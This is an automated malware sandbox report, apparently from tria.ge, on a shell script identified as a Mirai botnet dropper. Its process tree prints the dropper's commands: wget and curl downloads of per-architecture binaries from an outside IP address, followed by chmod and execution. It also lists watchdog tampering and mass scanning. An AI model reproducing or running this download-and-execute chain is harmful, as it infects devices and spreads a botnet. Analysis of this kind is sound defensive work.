Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
07/03/2025, 02:31
Static task
static1
Behavioral task
behavioral1
Sample
sh.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
sh.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
sh.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
sh.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
sh.sh
-
Size
1KB
-
MD5
c46ce91068e77aa58bd2127bec2ee6c3
-
SHA1
fced6e9a98cb1fd8b568f7698dbf1b4e1e4231d5
-
SHA256
6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a
-
SHA512
ace2a1517ff4dceb812a495e8f5d5a4bbec6825964ffca84b076f57610ed09232b3ad76e995fd83ba121d4a36f82acb0136f27da8d4fc272bd083ac1d8e3e7e9
Malware Config
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
Contacts a large (183324) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1531 chmod 1537 chmod 1543 chmod 1549 chmod 1561 chmod 1567 chmod 1555 chmod 1573 chmod 1516 chmod 1523 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/ssh 1517 sh.sh /tmp/ssh 1524 sh.sh /tmp/ssh 1532 sh.sh /tmp/ssh 1538 sh.sh /tmp/ssh 1544 sh.sh /tmp/ssh 1550 sh.sh /tmp/ssh 1556 sh.sh /tmp/ssh 1562 sh.sh /tmp/ssh 1568 sh.sh /tmp/ssh 1574 sh.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog sh.sh File opened for modification /dev/misc/watchdog sh.sh -
Renames itself 1 IoCs
pid Process 1517 sh.sh -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 194.36.144.87 -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp sh.sh -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself cron 1517 sh.sh -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp sh.sh -
description ioc Process File opened for reading /proc/325/status sh.sh File opened for reading /proc/16/comm sh.sh File opened for reading /proc/32/comm sh.sh File opened for reading /proc/160/comm sh.sh File opened for reading /proc/169/comm sh.sh File opened for reading /proc/426/comm sh.sh File opened for reading /proc/1178/comm sh.sh File opened for reading /proc/1564/maps sh.sh File opened for reading /proc/20/comm sh.sh File opened for reading /proc/1282/comm sh.sh File opened for reading /proc/1308/status sh.sh File opened for reading /proc/1511/status sh.sh File opened for reading /proc/1546/maps sh.sh File opened for reading /proc/1179/comm sh.sh File opened for reading /proc/1155/status sh.sh File opened for reading /proc/1178/status sh.sh File opened for reading /proc/5/comm sh.sh File opened for reading /proc/1070/comm sh.sh File opened for reading /proc/961/status sh.sh File opened for reading /proc/85/comm sh.sh File opened for reading /proc/691/comm sh.sh File opened for reading /proc/171/comm sh.sh File opened for reading /proc/671/comm sh.sh File opened for reading /proc/1308/comm sh.sh File opened for reading /proc/493/status sh.sh File opened for reading /proc/913/status sh.sh File opened for reading /proc/1535/maps sh.sh File opened for reading /proc/1559/maps sh.sh File opened for reading /proc/1142/status sh.sh File opened for reading /proc/self/maps sh.sh File opened for reading /proc/26/comm sh.sh File opened for reading /proc/649/status sh.sh File opened for reading /proc/1547/cmdline sh.sh File opened for reading /proc/167/comm sh.sh File opened for reading /proc/175/comm sh.sh File opened for reading /proc/325/comm sh.sh File opened for reading /proc/1151/comm sh.sh File opened for reading /proc/1151/status sh.sh File opened for reading /proc/19/comm sh.sh File opened for reading /proc/1027/comm sh.sh File opened for reading /proc/473/status sh.sh File opened for reading /proc/1540/cmdline sh.sh File opened for reading /proc/1204/comm sh.sh File opened for reading /proc/502/status sh.sh File opened for reading /proc/731/status sh.sh File opened for reading /proc/510/comm sh.sh File opened for reading /proc/431/status sh.sh File opened for reading /proc/1553/cmdline sh.sh File opened for reading /proc/477/comm sh.sh File opened for reading /proc/1146/comm sh.sh File opened for reading /proc/1319/comm sh.sh File opened for reading /proc/1502/comm sh.sh File opened for reading /proc/477/status sh.sh File opened for reading /proc/1176/status sh.sh File opened for reading /proc/1179/status sh.sh File opened for reading /proc/1529/maps sh.sh File opened for reading /proc/82/comm sh.sh File opened for reading /proc/161/comm sh.sh File opened for reading /proc/319/comm sh.sh File opened for reading /proc/427/comm sh.sh File opened for reading /proc/965/comm sh.sh File opened for reading /proc/1107/comm sh.sh File opened for reading /proc/1529/cmdline sh.sh File opened for reading /proc/736/comm sh.sh -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1519 wget 1521 curl 1522 cat -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jklx86 wget File opened for modification /tmp/jklx86 curl File opened for modification /tmp/ssh sh.sh File opened for modification /tmp/jklmips wget File opened for modification /tmp/jklmips curl File opened for modification /tmp/jklmpsl wget
Processes
-
/tmp/sh.sh/tmp/sh.sh1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1509 -
/usr/bin/wgetwget http://176.65.134.5/jklx862⤵
- Writes file to tmp directory
PID:1510
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklx862⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/catcat jklx862⤵PID:1515
-
-
/bin/chmodchmod +x config-err-dB3BHa jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1516
-
-
/usr/bin/wgetwget http://176.65.134.5/jklmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1519
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1521
-
-
/bin/catcat jklmips2⤵
- System Network Configuration Discovery
PID:1522
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/ssh./ssh ssh2⤵PID:1524
-
-
/usr/bin/wgetwget http://176.65.134.5/jklmpsl2⤵
- Writes file to tmp directory
PID:1526
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklmpsl2⤵PID:1529
-
-
/bin/catcat jklmpsl2⤵PID:1530
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklmpsl jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/ssh./ssh ssh2⤵PID:1532
-
-
/usr/bin/wgetwget http://176.65.134.5/jklarm42⤵PID:1534
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklarm42⤵PID:1535
-
-
/bin/catcat jklarm42⤵PID:1536
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklmpsl jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/ssh./ssh ssh2⤵PID:1538
-
-
/usr/bin/wgetwget http://176.65.134.5/jklarm52⤵PID:1540
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklarm52⤵PID:1541
-
-
/bin/catcat jklarm52⤵PID:1542
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklmpsl jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/ssh./ssh ssh2⤵PID:1544
-
-
/usr/bin/wgetwget http://176.65.134.5/jklarm62⤵PID:1546
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklarm62⤵PID:1547
-
-
/bin/catcat jklarm62⤵PID:1548
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklmpsl jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/ssh./ssh ssh2⤵PID:1550
-
-
/usr/bin/wgetwget http://176.65.134.5/jklarm72⤵PID:1552
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklarm72⤵PID:1553
-
-
/bin/catcat jklarm72⤵PID:1554
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklmpsl jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/ssh./ssh ssh2⤵PID:1556
-
-
/usr/bin/wgetwget http://176.65.134.5/jklppc2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklppc2⤵PID:1559
-
-
/bin/catcat jklppc2⤵PID:1560
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklmpsl jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/ssh./ssh ssh2⤵PID:1562
-
-
/usr/bin/wgetwget http://176.65.134.5/jklm68k2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklm68k2⤵PID:1565
-
-
/bin/catcat jklm68k2⤵PID:1566
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklmpsl jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/ssh./ssh ssh2⤵PID:1568
-
-
/usr/bin/wgetwget http://176.65.134.5/jklsh42⤵PID:1570
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklsh42⤵PID:1571
-
-
/bin/catcat jklsh42⤵PID:1572
-
-
/bin/chmodchmod +x config-err-dB3BHa jklmips jklmpsl jklx86 netplan_ke6ktkgw sh.sh snap-private-tmp ssh ssh-bH0eWunku0iN systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-bolt.service-Ocwvmt systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-colord.service-c2cuRy systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-ModemManager.service-K8fZsT systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-resolved.service-E88vp7 systemd-private-2dcc1cf0ee8b4de2878fd53c233c9623-systemd-timedated.service-mAYft12⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/ssh./ssh ssh2⤵PID:1574
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
74KB
MD5da5f082847104367fefde63653084863
SHA163a45455eb18ea7f6f5d1b374bd1cb18781c6a86
SHA2566fc1f441c08b49ceb3083fa2a201d424c5282ec7a5cd2431bd017490ba2b23de
SHA5122c406081e2a226af6dbe06370224d14dca11f73b7532069ca028027816eb61122b6b49e9ec672c041cf362792aa1e23ca9e29dbe8c580e8838a6f7d2c2edffa6
-
Filesize
74KB
MD5eb8e5a5d4d7a332bf23f7cc07c05389f
SHA1dd9291fec1c6905ba48fdf18462a0a350e82d36a
SHA2560ee587fea341d9da43777102b508c6017d29ad537594afa596e042d4ecd67cf8
SHA512c5aa6c4e4c4218b21d2f0cf7cdab53f7b21c8f615db7bcf1f11f9aed5e0efc57d09abfcdf6205fa16808c7af0ada585c357c7f6913bfeda02737411f8a1dbcec
-
Filesize
49KB
MD584597b4e86a02818478e8e9ef7c74485
SHA180d83dea146a0fc48a5154c87d19bbefd3a1c26b
SHA25628bb529e99c8730de533d64995979a491d6af643ddcd99997788ff945dc6b426
SHA51202d3c182c9b10bc5a21a0459599d86b4254307e11e35e77e140c82dd97b86ed180c73c5068fd4706e6f7d2896b167521f5cbc67a89d457a1aaf77770180ae08f